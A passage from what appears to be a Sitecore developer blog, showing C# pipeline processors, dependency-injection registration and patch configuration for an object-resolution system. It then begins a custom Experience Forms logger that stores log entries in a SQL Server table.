Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject.SetObjectLocatorProcessor { public class SetObjectLocator : ResolveProcessor<ResolveObjectArgs>, ISetObjectLocator { private readonly IObjectLocatorService _objectLocatorService; public SetObjectLocator(IObjectLocatorService objectLocatorService) { _objectLocatorService = objectLocatorService; } protected override bool CanProcess(ResolveObjectArgs args) => base.CanProcess(args) && args.ObjectLocator == null; protected override void Execute(ResolveObjectArgs args) => args.ObjectLocator = GetObjectLocator(); protected virtual IObjectLocator GetObjectLocator() => _objectLocatorService; } } The class above just sets the IObjectLocatorService — this is the service class which wraps the <locateObject /> pipeline defined further up in this post — on the ResolveObjectArgs instance. I then created the following interface to delegate to the ObjectLocator property on the ResolveObjectArgs to “locate” the object: namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject.LocateObjectProcessor { public interface ILocateObject { void Process(ResolveObjectArgs args); } } And here’s the class that implements this interface above: using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectLocators; using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ObjectLocators; namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject.LocateObjectProcessor { public class LocateObject : ResolveProcessor<ResolveObjectArgs>, ILocateObject { private readonly IObjectLocatorArgumentsFactory _objectLocatorArgumentsFactory; public LocateObject(IObjectLocatorArgumentsFactory objectLocatorArgumentsFactory) { _objectLocatorArgumentsFactory = objectLocatorArgumentsFactory; } protected override bool CanProcess(ResolveObjectArgs args) => base.CanProcess(args) && args.Object == null && args.ObjectLocator != null; protected override void Execute(ResolveObjectArgs args) { args.Object = Locate(args); args.FoundInContainer = args.Object != null; if (!args.FoundInContainer) { return; } AbortPipeline(args); } protected virtual object Locate(ResolveObjectArgs args) => args.ObjectLocator.Resolve(CreateObjectLocatorArguments(args)); protected virtual ObjectLocatorArguments CreateObjectLocatorArguments(ResolveObjectArgs args) => _objectLocatorArgumentsFactory.CreateObjectLocatorArguments(args); } } The above class just tries to “locate” the object using the ObjectLocator set on the ResolveObjectArgs instance. In the event we can’t find the object via the IObjectLocator, we should create the object instead. I created the following interface to set an IObjectCreator instance on the ResolveObjectArgs instance: namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject.SetObjectCreatorProcessor { public interface ISetObjectCreator { void Process(ResolveObjectArgs args); } } And here’s its implementation class: using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectCreators; namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject.SetObjectCreatorProcessor { public class SetObjectCreator : ResolveProcessor<ResolveObjectArgs>, ISetObjectCreator { private readonly IObjectCreatorService _objectCreatorService; public SetObjectCreator(IObjectCreatorService objectCreatorService) { _objectCreatorService = objectCreatorService; } protected override bool CanProcess(ResolveObjectArgs args) => base.CanProcess(args) && args.ObjectCreator == null; protected override void Execute(ResolveObjectArgs args) => args.ObjectCreator = GetObjectCreator(); protected virtual IObjectCreator GetObjectCreator() => _objectCreatorService; } } The class above just sets the IObjectCreatorService — this is the service class which wraps the <createObject /> pipeline defined further up in this post — on the ResolveObjectArgs instance. Next, we need to delegate to this IObjectCreator to create the object. The following interface is for a class that creates objects: namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject.CreateObjectProcessor { public interface ICreateObject { void Process(ResolveObjectArgs args); } } And here’s the implementation of the interface above: using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectCreators; using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ObjectCreators; namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject.CreateObjectProcessor { public class CreateObject : ResolveProcessor<ResolveObjectArgs>, ICreateObject { private readonly IObjectCreatorArgumentsFactory _objectCreatorArgumentsFactory; public CreateObject(IObjectCreatorArgumentsFactory objectCreatorArgumentsFactory) { _objectCreatorArgumentsFactory = objectCreatorArgumentsFactory; } protected override bool CanProcess(ResolveObjectArgs args) => base.CanProcess(args) && args.Object == null && args.ObjectCreator != null; protected override void Execute(ResolveObjectArgs args) => args.Object = Resolve(args); protected virtual object Resolve(ResolveObjectArgs args) => args.ObjectCreator.Resolve(CreateObjectCreatorArguments(args)); protected virtual ObjectCreatorArguments CreateObjectCreatorArguments(ResolveObjectArgs args) => _objectCreatorArgumentsFactory.CreateObjectCreatorArguments(args); } } The class above just delegates to the IObjectCreator instance of the ResolveObjectArgs instance to create the object Like the other 4 pipelines — holy cannoli, Batman, there are 5 pipelines in total in this solution! — I created a service class that wraps this new pipeline. The following class serves as a settings class for this service: namespace Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectResolvers { public class ObjectResolverServiceSettings { public string ResolveObjectPipelineName { get; set; } public bool UseTypeCache { get; set; } } } An instance of the above is created by the Sitecore Configuration Factory. The following interface defines a family of classes that “resolve” objects. Unlike the other pipelines, we will only have one class that implements this interface: using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectResolvers; namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectResolvers { public interface IObjectResolver { TObject Resolve<TObject>(ObjectResolverArguments arguments) where TObject : class; object Resolve(ObjectResolverArguments arguments); } } The following class implements the interface above: using Sitecore.Abstractions; using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectResolvers; using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject; using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ObjectResolvers; namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectResolvers { public class ObjectResolverService : PipelineObjectResolver<ObjectResolverArguments, ResolveObjectArgs, object>, IObjectResolver { private readonly ObjectResolverServiceSettings _settings; private readonly IObjectResolverArgumentsFactory _objectResolverArgumentsFactory; public ObjectResolverService(ObjectResolverServiceSettings settings, IObjectResolverArgumentsFactory objectResolverArgumentsFactory, BaseCorePipelineManager corePipelineManager) : base(corePipelineManager) { _settings = settings; _objectResolverArgumentsFactory = objectResolverArgumentsFactory; } public TObject Resolve<TObject>(ObjectResolverArguments arguments) where TObject : class { return Resolve(arguments) as TObject; } protected override object GetObject(ResolveObjectArgs args) { return args.Object; } protected override ResolveObjectArgs CreatePipelineArgs(ObjectResolverArguments arguments) => _objectResolverArgumentsFactory.CreateResolveObjectArgs(arguments); protected override string GetPipelineName() => _settings.ResolveObjectPipelineName; } } I then register every single thing above — and I mean EVERYTHING — in the Sitecore IoC via the following IServicesConfigurator class: using System; using Microsoft.Extensions.DependencyInjection; using Sitecore.Abstractions; using Sitecore.DependencyInjection; using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ItemResolvers; using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectCreators; using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectLocators; using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectResolvers; using Sandbox.Foundation.ObjectResolution.Models.Resolvers.TypeResolvers; using Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.AddDefaultObjectCreatorProcessor; using Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.CacheTypeProcessor; using Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.CreateObjectProcessor; using Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.ResolveTypeProcessor; using Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.SetTypeCacherProcessor; using Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.SetTypeResolverProcessor; using Sandbox.Foundation.ObjectResolution.Pipelines.LocateObject.AddDefaultObjectLocatorProcessor; using Sandbox.Foundation.ObjectResolution.Pipelines.LocateObject.LocateObjectProcessor; using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveItem.AddDefaultItemResolverProcessor; using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveItem.ResolveItemProcessor; using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject.SetObjectCreatorProcessor; using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject.SetObjectLocatorProcessor; using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.AddDefaultTypeResolverProcessor; using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.SetItemResolverProcessor; using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.SetTypeNameProcessor; using Sandbox.Foundation.ObjectResolution.Services.Cachers; using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ItemResolvers; using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ObjectCreators; using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ObjectLocators; using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ObjectResolvers; using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.TypeResolvers; using Sandbox.Foundation.ObjectResolution.Services.Reflection; using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ItemResolvers; using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectCreators; using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectLocators; using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectResolvers; using Sandbox.Foundation.ObjectResolution.Services.Resolvers.TypeResolvers; namespace Sandbox.Foundation.ObjectResolution { public class ObjectResolutionConfigurator : IServicesConfigurator { public void Configure(IServiceCollection serviceCollection) { ConfigureCachers(serviceCollection); ConfigureFactories(serviceCollection); ConfigureItemResolvers(serviceCollection); ConfigureTypeResolvers(serviceCollection); ConfigureObjectCreators(serviceCollection); ConfigureObjectLocators(serviceCollection); ConfigureObjectResolvers(serviceCollection); ConfigureResolveItemPipelineProcessors(serviceCollection); ConfigureResolveTypePipelineProcessors(serviceCollection); ConfigureLocateObjectPipelineProcessors(serviceCollection); ConfigureCreateObjectPipelineProcessors(serviceCollection); ConfigureResolveObjectPipelineProcessors(serviceCollection); ConfigureOtherServices(serviceCollection); } private void ConfigureCachers(IServiceCollection serviceCollection) { serviceCollection.AddSingleton<ITypeCacher, TypeCacher>(); } private void ConfigureFactories(IServiceCollection serviceCollection) { serviceCollection.AddSingleton<IItemResolverArgumentsFactory, ItemResolverArgumentsFactory>(); serviceCollection.AddSingleton<ITypeResolverArgumentsFactory, TypeResolverArgumentsFactory>(); serviceCollection.AddSingleton<IObjectLocatorArgumentsFactory, ObjectLocatorArgumentsFactory>(); serviceCollection.AddSingleton<IObjectCreatorArgumentsFactory, ObjectCreatorArgumentsFactory>(); serviceCollection.AddSingleton<IObjectResolverArgumentsFactory, ObjectResolverArgumentsFactory>(); } private void ConfigureItemResolvers(IServiceCollection serviceCollection) { serviceCollection.AddSingleton<IDatabaseItemResolver, DatabaseItemResolver>(); serviceCollection.AddSingleton(GetItemResolverServiceSetting); serviceCollection.AddSingleton<IItemResolverService, ItemResolverService>(); } private ItemResolverServiceSettings GetItemResolverServiceSetting(IServiceProvider provider) { return CreateConfigObject<ItemResolverServiceSettings>(provider, "moduleSettings/foundation/objectResolution/itemResolverServiceSettings"); } private void ConfigureTypeResolvers(IServiceCollection serviceCollection) { serviceCollection.AddSingleton<IReflectionTypeResolver, ReflectionTypeResolver>(); serviceCollection.AddSingleton(GetTypeResolverServiceSettings); serviceCollection.AddSingleton<ITypeResolverService, TypeResolverService>(); } private TypeResolverServiceSettings GetTypeResolverServiceSettings(IServiceProvider provider) { return CreateConfigObject<TypeResolverServiceSettings>(provider, "moduleSettings/foundation/objectResolution/typeResolverServiceSettings"); } private void ConfigureObjectCreators(IServiceCollection serviceCollection) { serviceCollection.AddSingleton<IReflectionObjectCreator, ReflectionObjectCreator>(); serviceCollection.AddSingleton(GetObjectCreatorServiceSettings); serviceCollection.AddSingleton<IObjectCreatorService, ObjectCreatorService>(); } private ObjectCreatorServiceSettings GetObjectCreatorServiceSettings(IServiceProvider provider) { return CreateConfigObject<ObjectCreatorServiceSettings>(provider, "moduleSettings/foundation/objectResolution/objectCreatorServiceSettings"); } private void ConfigureObjectLocators(IServiceCollection serviceCollection) { serviceCollection.AddSingleton<IServiceProviderLocator, ServiceProviderLocator>(); serviceCollection.AddSingleton(GetObjectLocatorServiceSettings); serviceCollection.AddSingleton<IObjectLocatorService, ObjectLocatorService>(); } private ObjectLocatorServiceSettings GetObjectLocatorServiceSettings(IServiceProvider provider) { return CreateConfigObject<ObjectLocatorServiceSettings>(provider, "moduleSettings/foundation/objectResolution/objectLocatorServiceSettings"); } private void ConfigureObjectResolvers(IServiceCollection serviceCollection) { serviceCollection.AddSingleton<IReflectionObjectCreator, ReflectionObjectCreator>(); serviceCollection.AddSingleton(GetObjectResolverServiceSettings); serviceCollection.AddSingleton<IObjectResolver, ObjectResolverService>(); } private ObjectResolverServiceSettings GetObjectResolverServiceSettings(IServiceProvider provider) { return CreateConfigObject<ObjectResolverServiceSettings>(provider, "moduleSettings/foundation/objectResolution/objectResolverServiceSettings"); } private void ConfigureResolveItemPipelineProcessors(IServiceCollection serviceCollection) { serviceCollection.AddSingleton<IAddDefaultItemResolver, AddDefaultItemResolver>(); serviceCollection.AddSingleton<IResolveItem, ResolveItem>(); } private void ConfigureResolveTypePipelineProcessors(IServiceCollection serviceCollection) { serviceCollection.AddSingleton<ISetItemResolver, SetItemResolver>(); serviceCollection.AddSingleton<Pipelines.ResolveType.ResolveTypeProcessor.IResolveItem, Pipelines.ResolveType.ResolveTypeProcessor.ResolveItem>(); serviceCollection.AddSingleton<ISetTypeName, SetTypeName>(); serviceCollection.AddSingleton<IAddDefaultTypeResolver, AddDefaultTypeResolver>(); serviceCollection.AddSingleton<Pipelines.ResolveType.SetTypeCacherProcessor.ISetTypeCacher, Pipelines.ResolveType.SetTypeCacherProcessor.SetTypeCacher>(); serviceCollection.AddSingleton<Pipelines.ResolveType.ResolveTypeProcessor.IResolveType, Pipelines.ResolveType.ResolveTypeProcessor.ResolveType>(); } private void ConfigureLocateObjectPipelineProcessors(IServiceCollection serviceCollection) { serviceCollection.AddSingleton<Pipelines.LocateObject.SetTypeResolverProcessor.ISetTypeResolver, Pipelines.LocateObject.SetTypeResolverProcessor.SetTypeResolver>(); serviceCollection.AddSingleton<Pipelines.LocateObject.ResolveTypeProcessor.IResolveType, Pipelines.LocateObject.ResolveTypeProcessor.ResolveType>(); serviceCollection.AddSingleton<IAddDefaultObjectLocator, AddDefaultObjectLocator>(); serviceCollection.AddSingleton<ILocateObject, LocateObject>(); } private void ConfigureCreateObjectPipelineProcessors(IServiceCollection serviceCollection) { serviceCollection.AddSingleton<ISetTypeResolver, SetTypeResolver>(); serviceCollection.AddSingleton<IResolveType, ResolveType>(); serviceCollection.AddSingleton<IAddDefaultObjectCreator, AddDefaultObjectCreator>(); serviceCollection.AddSingleton<ICreateObject, CreateObject>(); serviceCollection.AddSingleton<ISetTypeCacher, SetTypeCacher>(); serviceCollection.AddSingleton<ICacheType, CacheType>(); } private void ConfigureResolveObjectPipelineProcessors(IServiceCollection serviceCollection) { serviceCollection.AddSingleton<Pipelines.ResolveObject.ISetTypeResolver, Pipelines.ResolveObject.SetTypeResolver>(); serviceCollection.AddSingleton<Pipelines.ResolveObject.ResolveTypeProcessor.IResolveType, Pipelines.ResolveObject.ResolveTypeProcessor.ResolveType>(); serviceCollection.AddSingleton<ISetObjectLocator, SetObjectLocator>(); serviceCollection.AddSingleton<Pipelines.ResolveObject.LocateObjectProcessor.ILocateObject, Pipelines.ResolveObject.LocateObjectProcessor.LocateObject>(); serviceCollection.AddSingleton<ISetObjectCreator, SetObjectCreator>(); serviceCollection.AddSingleton<Pipelines.ResolveObject.CreateObjectProcessor.ICreateObject, Pipelines.ResolveObject.CreateObjectProcessor.CreateObject>(); } private void ConfigureOtherServices(IServiceCollection serviceCollection) { serviceCollection.AddSingleton<IReflectionUtilService, ReflectionUtilService>(); } private TConfigObject CreateConfigObject<TConfigObject>(IServiceProvider provider, string path) where TConfigObject : class { BaseFactory factory = GetService<BaseFactory>(provider); return factory.CreateObject(path, true) as TConfigObject; } private TService GetService<TService>(IServiceProvider provider) { return provider.GetService<TService>(); } } } Finally, I strung all the pieces together using the following Sitecore patch config file: <configuration xmlns:patch="http://www.sitecore.net/xmlconfig/"> <sitecore> <services> <configurator type="Sandbox.Foundation.ObjectResolution.ObjectResolutionConfigurator, Sandbox.Foundation.ObjectResolution" /> </services> <pipelines> <resolveItem> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.ResolveItem.AddDefaultItemResolverProcessor.IAddDefaultItemResolver, Sandbox.Foundation.ObjectResolution" resolve="true" /> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.ResolveItem.ResolveItemProcessor.IResolveItem, Sandbox.Foundation.ObjectResolution" resolve="true" /> </resolveItem> <resolveType> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.SetItemResolverProcessor.ISetItemResolver, Sandbox.Foundation.ObjectResolution" resolve="true" /> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.ResolveTypeProcessor.IResolveItem, Sandbox.Foundation.ObjectResolution" resolve="true" /> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.SetTypeNameProcessor.ISetTypeName, Sandbox.Foundation.ObjectResolution" resolve="true" /> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.AddDefaultTypeResolverProcessor.IAddDefaultTypeResolver, Sandbox.Foundation.ObjectResolution" resolve="true" /> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.SetTypeCacherProcessor.ISetTypeCacher, Sandbox.Foundation.ObjectResolution" resolve="true" /> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.ResolveTypeProcessor.IResolveType, Sandbox.Foundation.ObjectResolution" resolve="true" /> </resolveType> <locateObject> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.LocateObject.SetTypeResolverProcessor.ISetTypeResolver, Sandbox.Foundation.ObjectResolution" resolve="true" /> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.LocateObject.ResolveTypeProcessor.IResolveType, Sandbox.Foundation.ObjectResolution" resolve="true" /> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.LocateObject.AddDefaultObjectLocatorProcessor.IAddDefaultObjectLocator, Sandbox.Foundation.ObjectResolution" resolve="true" /> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.LocateObject.LocateObjectProcessor.ILocateObject, Sandbox.Foundation.ObjectResolution" resolve="true" /> </locateObject> <createObject> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.SetTypeResolverProcessor.ISetTypeResolver, Sandbox.Foundation.ObjectResolution" resolve="true" /> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.ResolveTypeProcessor.IResolveType, Sandbox.Foundation.ObjectResolution" resolve="true" /> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.AddDefaultObjectCreatorProcessor.IAddDefaultObjectCreator, Sandbox.Foundation.ObjectResolution" resolve="true" /> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.CreateObjectProcessor.ICreateObject, Sandbox.Foundation.ObjectResolution" resolve="true" /> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.SetTypeCacherProcessor.ISetTypeCacher, Sandbox.Foundation.ObjectResolution" resolve="true" /> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.CacheTypeProcessor.ICacheType, Sandbox.Foundation.ObjectResolution" resolve="true" /> </createObject> <resolveObject> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject.ISetTypeResolver, Sandbox.Foundation.ObjectResolution" resolve="true" /> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject.ResolveTypeProcessor.IResolveType, Sandbox.Foundation.ObjectResolution" resolve="true" /> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject.SetObjectLocatorProcessor.ISetObjectLocator, Sandbox.Foundation.ObjectResolution" resolve="true" /> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject.LocateObjectProcessor.ILocateObject, Sandbox.Foundation.ObjectResolution" resolve="true" /> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject.SetObjectCreatorProcessor.ISetObjectCreator, Sandbox.Foundation.ObjectResolution" resolve="true" /> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject.CreateObjectProcessor.ICreateObject, Sandbox.Foundation.ObjectResolution" resolve="true" /> </resolveObject> </pipelines> <moduleSettings> <foundation> <objectResolution> <itemResolverServiceSettings type="Sandbox.Foundation.ObjectResolution.Models.Resolvers.ItemResolvers.ItemResolverServiceSettings, Sandbox.Foundation.ObjectResolution" singleInstance="true"> <ResolveItemPipelineName>resolveItem</ResolveItemPipelineName> </itemResolverServiceSettings> <typeResolverServiceSettings type="Sandbox.Foundation.ObjectResolution.Models.Resolvers.TypeResolvers.TypeResolverServiceSettings, Sandbox.Foundation.ObjectResolution" singleInstance="true"> <ResolveTypePipelineName>resolveType</ResolveTypePipelineName> </typeResolverServiceSettings> <objectLocatorServiceSettings type="Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectLocators.ObjectLocatorServiceSettings, Sandbox.Foundation.ObjectResolution" singleInstance="true"> <LocateObjectPipelineName>locateObject</LocateObjectPipelineName> </objectLocatorServiceSettings> <objectCreatorServiceSettings type="Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectCreators.ObjectCreatorServiceSettings, Sandbox.Foundation.ObjectResolution" singleInstance="true"> <CreateObjectPipelineName>createObject</CreateObjectPipelineName> </objectCreatorServiceSettings> <objectResolverServiceSettings type="Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectResolvers.ObjectResolverServiceSettings, Sandbox.Foundation.ObjectResolution" singleInstance="true"> <ResolveObjectPipelineName>resolveObject</ResolveObjectPipelineName> <UseTypeCache>true</UseTypeCache> </objectResolverServiceSettings> </objectResolution> </foundation> </moduleSettings> </sitecore> </configuration> In my next post, I will be using the entire system above for resolving custom Forms Submit Actions from the Sitecore IoC container. Stay tuned for that post. If you have made it this far, hats off to you. 😉 Sorry for throwing so much at you, but that’s what I do. 😉 On closing, I would like to mention that the system above could be used for resolving types from the Sitecore IoC container for WFFM but this is something that I will not investigate. If you happen to get this to work on WFFM, please share in a comment below. Until next time, keep on Sitecoring. Write Sitecore Experience Forms Log Entries to a Custom SQL Server Database Table Not long after I wrote the code for my last post, I continued exploring ways of changing service classes in Sitecore Experience Forms. One thing that popped out when continuing on this quest was Sitecore.ExperienceForms.Diagnostics.ILogger. I immediately thought “I just wrote code for retrieving Forms configuration settings from a SQL Server database table, why not create a new ILogger service class for storing log entries in a custom SQL table?” Well, that’s what I did, and the code in this post captures how I went about doing that. You might be asking “Mike, you know you can just use a SQL appender in log4net, right?” Well, I certainly could have but what fun would that have been? Anyways, let’s get started. We first need a class that represents a log entry. I created the following POCO class to serve that purpose: using System; namespace Sandbox.Foundation.Forms.Models.Logging { public class LogEntry { public Exception Exception { get; set; } public string LogEntryType { get; set; } public string LogMessage { get; set; } public string Message { get; set; } public object Owner { get; set; } public DateTime CreatedDate { get; set; } } } Since I hate calling the “new” keyword when creating new instances of classes, I chose to create a factory class. The following interface will be for instances of classes that create LogEntry instances: using System; using Sandbox.Foundation.Forms.Models.Logging; namespace Sandbox.Foundation.Forms.Services.Factories.Diagnostics { public interface ILogEntryFactory { LogEntry CreateLogEntry(string logEntryType, string message, Exception exception, Type ownerType, DateTime createdDate); LogEntry CreateLogEntry(string logEntryType, string message, Exception exception, object owner, DateTime createdDate); LogEntry CreateLogEntry(string logEntryType, string message, Type ownerType, DateTime createdDate); LogEntry CreateLogEntry(string logEntryType, string message, object owner, DateTime createdDate); } } Well, we can’t do much with just an interface. The following class implements the interface above. It creates an instance of LogEntry with the passed parameters to all methods (assuming the required parameters are passed with the proper values on them): using System; using Sandbox.Foundation.Forms.Models.Logging; namespace Sandbox.Foundation.Forms.Services.Factories.Diagnostics { public class LogEntryFactory : ILogEntryFactory { public LogEntry CreateLogEntry(string logEntryType, string message, Exception exception, Type ownerType, DateTime createdDate) { return CreateLogEntry(logEntryType, message, exception, ownerType, createdDate); } public LogEntry CreateLogEntry(string logEntryType, string message, Exception exception, object owner, DateTime createdDate) { if (!CanCreateLogEntry(logEntryType, message, owner, createdDate)) { return null; } return new LogEntry { LogEntryType = logEntryType, Message = message, Exception = exception, Owner = owner, CreatedDate = createdDate }; } public LogEntry CreateLogEntry(string logEntryType, string message, Type ownerType, DateTime createdDate) { return CreateLogEntry(logEntryType, message, ownerType, createdDate); } public LogEntry CreateLogEntry(string logEntryType, string message, object owner, DateTime createdDate) { if(!CanCreateLogEntry(logEntryType, message, owner, createdDate)) { return null; } return new LogEntry { LogEntryType = logEntryType, Message = message, Owner = owner, CreatedDate = createdDate }; } protected virtual bool CanCreateLogEntry(string logEntryType, string message, object owner, DateTime createdDate) { return !string.IsNullOrWhiteSpace(logEntryType) && !string.IsNullOrWhiteSpace(message) && owner != null && createdDate != DateTime.MinValue && createdDate != DateTime.MaxValue; } } } I didn’t want to send LogEntry instances directly to a repository class instance directly, so I created the following class to represent the entities which will ultimately be stored in the database: using System; namespace Sandbox.Foundation.Forms.Models.Logging { public class RepositoryLogEntry { public string LogEntryType { get; set; } public string LogMessage { get; set; } public DateTime Created { get; set; } } } As I had done with LogEntry, I created a factory class for it. The difference here is we will be passing an instance of LogEntry to this new factory so we can create a RepositoryLogEntry instance from it. The following interface is for factories of RepositoryLogEntry: using System; using Sandbox.Foundation.Forms.Models.Logging; namespace Sandbox.Foundation.Forms.Services.Factories.Diagnostics { public interface IRepositoryLogEntryFactory { RepositoryLogEntry CreateRepositoryLogEntry(LogEntry entry); RepositoryLogEntry CreateRepositoryLogEntry(string logEntryType, string logMessage, DateTime created); } } Now that we have the interface ready to go, we need an implementation class for it. The following class does the job: using System; using Sandbox.Foundation.Forms.Models.Logging; namespace Sandbox.Foundation.Forms.Services.Factories.Diagnostics { public class RepositoryLogEntryFactory : IRepositoryLogEntryFactory { public RepositoryLogEntry CreateRepositoryLogEntry(LogEntry entry) { return CreateRepositoryLogEntry(entry.LogEntryType, entry.LogMessage, entry.CreatedDate); } public RepositoryLogEntry CreateRepositoryLogEntry(string logEntryType, string logMessage, DateTime created) { if (!CanCreateRepositoryLogEntry(logEntryType, logMessage, created)) { return null; } return new RepositoryLogEntry { LogEntryType = logEntryType, LogMessage = logMessage, Created = created }; } protected virtual bool CanCreateRepositoryLogEntry(string logEntryType, string logMessage, DateTime created) { return !string.IsNullOrWhiteSpace(logEntryType) && !string.IsNullOrWhiteSpace(logMessage) && created != DateTime.MinValue && created != DateTime.MaxValue; } } } I’m following a similiar structure here as I had done in the LogEntryFactory class above. The CanCreateRepositoryLogEntry() method ensures required parameters are passed to methods on the class. If they are not, then a null reference is returned to the caller. Since I hate hardcoding things, I decided to create a service class that gets the newline character. The following interface is for classes that do that: namespace Sandbox.Foundation.Forms.Services.Environment { public interface IEnvironmentService { string GetNewLine(); } } This next class implements the interface above: namespace Sandbox.Foundation.Forms.Services.Environment { public class EnvironmentService : IEnvironmentService { public string GetNewLine() { return System.Environment.NewLine; } } } In the class above, I’m taking advantage of stuff build into the .NET library for getting the newline character. I love when I discover things like this, albeit wish I had found something like this when trying to find an html break string for something I was working on the other day, but I digress (if you know of a way, please let me know in a comment below 😉 ). The above interface and class might seem out of place in this post but I am using them when formatting messages for the LogEntry instances further down in another service class. Just keep an eye out for it. Since I loathe hardcoding strings with a passion, I like to hide these away in Sitecore configuration patch files and hydrate a POCO class instance with the values from the aforementioned configuration. The following class is such a POCO settings object for a service class I will discuss further down in the post: namespace Sandbox.Foundation.Forms.Models.Logging { public class LogEntryServiceSettings { public string DebugLogEntryType { get; set; } public string ErrorLogEntryType { get; set; } public string FatalLogEntryType { get; set; } public string InfoLogEntryType { get; set; } public string WarnLogEntryType { get; set; } public string ExceptionPrefix { get; set; } public string MessagePrefix { get; set; } public string SourcePrefix { get; set; } public string NestedExceptionPrefix { get; set; } public string LogEntryTimeFormat { get; set; } } } Okay, so need we need to know what “type” of LogEntry we are dealing with — is it an error or a warning or what? — before sending to a repository to save in the database. I created the following interface for service classes that return back strings for the different LogEntry types, and also generate a log message from the data on properties on the LogEntry instance — this is the message that will end up in the database for the LogEntry: using Sandbox.Foundation.Forms.Models.Logging; namespace Sandbox.Foundation.Forms.Services.Diagnostics { public interface ILogEntryService { string GetDebugLogEntryType(); string GetErrorLogEntryType(); string GetFatalLogEntryType(); string GetInfoLogEntryType(); string GetWarnLogEntryType(); string GenerateLogMessage(LogEntry entry); } } And here is its implementation class: using System; using System.Text; using Sandbox.Foundation.Forms.Models.Logging; using Sandbox.Foundation.Forms.Services.Environment; namespace Sandbox.Foundation.Forms.Services.Diagnostics { public class LogEntryService : ILogEntryService { private readonly string _newLine; private readonly LogEntryServiceSettings _logEntryServiceSettings; public LogEntryService(IEnvironmentService environmentService, LogEntryServiceSettings logEntryServiceSettings) { _newLine = GetNewLine(environmentService); _logEntryServiceSettings = logEntryServiceSettings; } protected virtual string GetNewLine(IEnvironmentService environmentService) { return environmentService.GetNewLine(); } public string GetDebugLogEntryType() { return _logEntryServiceSettings.DebugLogEntryType; } public string GetErrorLogEntryType() { return _logEntryServiceSettings.ErrorLogEntryType; } public string GetFatalLogEntryType() { return _logEntryServiceSettings.FatalLogEntryType; } public string GetInfoLogEntryType() { return _logEntryServiceSettings.InfoLogEntryType; } public string GetWarnLogEntryType() { return _logEntryServiceSettings.WarnLogEntryType; } public string GenerateLogMessage(LogEntry entry) { if(!CanGenerateLogMessage(entry)) { return string.Empty; } string exceptionMessage = GenerateExceptionMessage(entry.Exception); if(string.IsNullOrWhiteSpace(exceptionMessage)) { return $"{entry.Message}"; } return $"{entry.Message} {exceptionMessage}"; } protected virtual bool 